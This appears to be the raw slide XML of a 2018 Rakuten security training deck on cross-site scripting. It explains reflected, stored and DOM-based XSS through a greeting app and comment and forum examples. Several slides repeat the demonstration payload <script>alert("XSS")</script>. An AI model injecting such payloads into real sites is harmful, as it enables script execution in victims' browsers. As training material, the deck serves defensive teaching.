Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.tiff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4.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.tiff"/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4.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.tiff"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.x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4.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.tiff"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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4.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.x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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.tiff"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.x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20.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28.x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rakuten-it.com/confluence/x/w8RNRg" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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3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4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5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27.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag43.x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25.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.x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tags" Target="../tags/tag4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7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tags" Target="../tags/tag49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tags" Target="../tags/tag50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tags" Target="../tags/tag5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tags" Target="../tags/tag52.x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5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tags" Target="../tags/tag5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tags" Target="../tags/tag5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tags" Target="../tags/tag5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tags" Target="../tags/tag57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tags" Target="../tags/tag5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7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tags" Target="../tags/tag59.x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tags" Target="../tags/tag60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32.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag61.xml"/><Relationship Id="rId2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tags" Target="../tags/tag62.xml"/><Relationship Id="rId2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tags" Target="../tags/tag6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tags" Target="../tags/tag64.xml"/><Relationship Id="rId2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tags" Target="../tags/tag65.xml"/><Relationship Id="rId2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tags" Target="../tags/tag6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5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tags" Target="../tags/tag67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tags" Target="../tags/tag68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tags" Target="../tags/tag69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tags" Target="../tags/tag70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tags" Target="../tags/tag7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tags" Target="../tags/tag72.xml"/><Relationship Id="rId2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image" Target="../media/image6.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag73.xml"/><Relationship Id="rId2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tags" Target="../tags/tag74.xml"/><Relationship Id="rId2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tags" Target="../tags/tag75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8.tif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tags" Target="../tags/tag76.xml"/><Relationship Id="rId2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image" Target="../media/image6.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag77.xml"/><Relationship Id="rId2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rveymonkey.com/r/STHW20170928" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag78.xml"/><Relationship Id="rId2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tags" Target="../tags/tag79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tags" Target="../tags/tag80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tags" Target="../tags/tag8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tags" Target="../tags/tag8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tags" Target="../tags/tag8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tags" Target="../tags/tag8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tags" Target="../tags/tag8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tags" Target="../tags/tag8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png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.tiff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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="540000"/>
            <a:ext cx="8424000" cy="2160000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0"/>
              <a:t>Security Threats Hands On Web</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="サブタイトル 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="4038600"/>
            <a:ext cx="8424000" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Mar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/2018</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>IT Security Engineering Office, ISGD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Rakuten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Inc.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0534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0" y="1752600"/>
            <a:ext cx="3873499" cy="38734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200" y="3277800"/>
            <a:ext cx="760800" cy="7608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What is XSS?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The ability to injection </a:t>
            </a:r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Client Side Scripts or HTML tags </a:t>
            </a:r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via a vulnerable web application</a:t>
            </a:r>
          </a:p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Client Side Scripts executes in the </a:t>
            </a:r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client’s browser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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2042160" y="2147920"/>
            <a:ext cx="5583237" cy="2498660"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1264"/>
              <a:gd name="adj2" fmla="val -83260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r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injecting JavaScript or VBScript, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and get it executed </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>at the victim’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex: &lt;script&gt;alert(0)&lt;/script&gt;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04/22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8192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0" y="1752600"/>
            <a:ext cx="3873499" cy="38734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200" y="3277800"/>
            <a:ext cx="760800" cy="7608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A simple example of XSS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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty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vulnerable web application</a:t>
            </a:r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 that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" u="sng" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>greets you by the name you input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" u="sng" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>No checking for user inputs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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971799"/>
            <a:ext cx="4882890" cy="642411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05200" y="3093134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1. My name is Chris</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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00642" y="3730939"/>
            <a:ext cx="1614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2. Hi, Chris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05/22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3311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0" y="1752600"/>
            <a:ext cx="3873499" cy="38734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200" y="3277800"/>
            <a:ext cx="760800" cy="7608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A simple example of XSS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Assuming a web application that greets you by the name you input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" b="1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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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996094"/>
            <a:ext cx="3511346" cy="4630005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangular Callout 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4216614" y="947101"/>
            <a:ext cx="4436278" cy="2079133"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63444"/>
              <a:gd name="adj2" fmla="val 95913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45214" y="1478835"/>
            <a:ext cx="4207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What if my name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“XSS”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??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06/22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6792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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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A simple example of XSS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400" b="1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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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8401" y="3074668"/>
            <a:ext cx="504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My name is &lt;script&gt;alert(“XSS”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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79505" y="3730939"/>
            <a:ext cx="3983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 Hi &lt;script&gt;alert(“XSS”)&lt;/script&gt;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948838"/>
            <a:ext cx="942042" cy="12421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07/22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9064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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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A simple example of XSS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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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8401" y="3093134"/>
            <a:ext cx="504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My name is &lt;script&gt;alert(“XSS”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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79505" y="3730939"/>
            <a:ext cx="3983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 Hi &lt;script&gt;alert(“XSS”)&lt;/script&gt;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948838"/>
            <a:ext cx="942042" cy="12421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6900" y="2692400"/>
            <a:ext cx="3035300" cy="1803400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08/22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5124" name="Picture 4" descr="http://boomag.ch/wp-content/uploads/2015/11/Boomlogo_trans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7153" y="4015104"/>
            <a:ext cx="2667000" cy="188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1224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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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8401" y="3093134"/>
            <a:ext cx="504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My name is &lt;script&gt;alert(“XSS”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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79505" y="3730939"/>
            <a:ext cx="3983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 Hi &lt;script&gt;alert(“XSS”)&lt;/script&gt;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948838"/>
            <a:ext cx="942042" cy="12421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11/22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1704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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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8401" y="3093134"/>
            <a:ext cx="504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Comment: &lt;script&gt;alert(“XSS”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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6157" y="3731049"/>
            <a:ext cx="2649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 Database Updated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948838"/>
            <a:ext cx="942042" cy="1242162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 bwMode="auto">
          <a:xfrm>
            <a:off x="7727949" y="3714750"/>
            <a:ext cx="609600" cy="1739899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79558" y="4245235"/>
            <a:ext cx="64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6248400" y="1562701"/>
            <a:ext cx="2594276" cy="764345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24611"/>
              <a:gd name="adj2" fmla="val 77357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56093" y="1607918"/>
            <a:ext cx="2535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Ex: Some EC site with comment functionality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589" y="5047789"/>
            <a:ext cx="895811" cy="8958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579" y="5000531"/>
            <a:ext cx="897082" cy="939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12/22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395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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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6601" y="3093134"/>
            <a:ext cx="2971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Show me the comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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41445" y="3731049"/>
            <a:ext cx="3540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 &lt;script&gt;alert(“XSS”)&lt;/script&gt;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Down Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7727949" y="3714750"/>
            <a:ext cx="609600" cy="1739899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79558" y="4245235"/>
            <a:ext cx="64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45626" y="1869845"/>
            <a:ext cx="253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Ex: Web forum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579" y="3114414"/>
            <a:ext cx="897082" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangular Callout 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="1562701"/>
            <a:ext cx="2594276" cy="764345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24611"/>
              <a:gd name="adj2" fmla="val 77357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56093" y="1607918"/>
            <a:ext cx="2535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Ex: Some EC site with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comment functionality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13/22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316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ular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="1562701"/>
            <a:ext cx="2594276" cy="764345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24611"/>
              <a:gd name="adj2" fmla="val 77357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56093" y="1607918"/>
            <a:ext cx="2535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Ex: Some EC site with comment functionality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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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6601" y="3093134"/>
            <a:ext cx="2819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Show me the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dicussion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Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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41445" y="3731049"/>
            <a:ext cx="3540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 &lt;script&gt;alert(“XSS”)&lt;/script&gt;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Down Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7727949" y="3714750"/>
            <a:ext cx="609600" cy="1739899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79558" y="4245235"/>
            <a:ext cx="64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6916440" y="1756146"/>
            <a:ext cx="1926236" cy="570899"/>
          </a:xfrm>
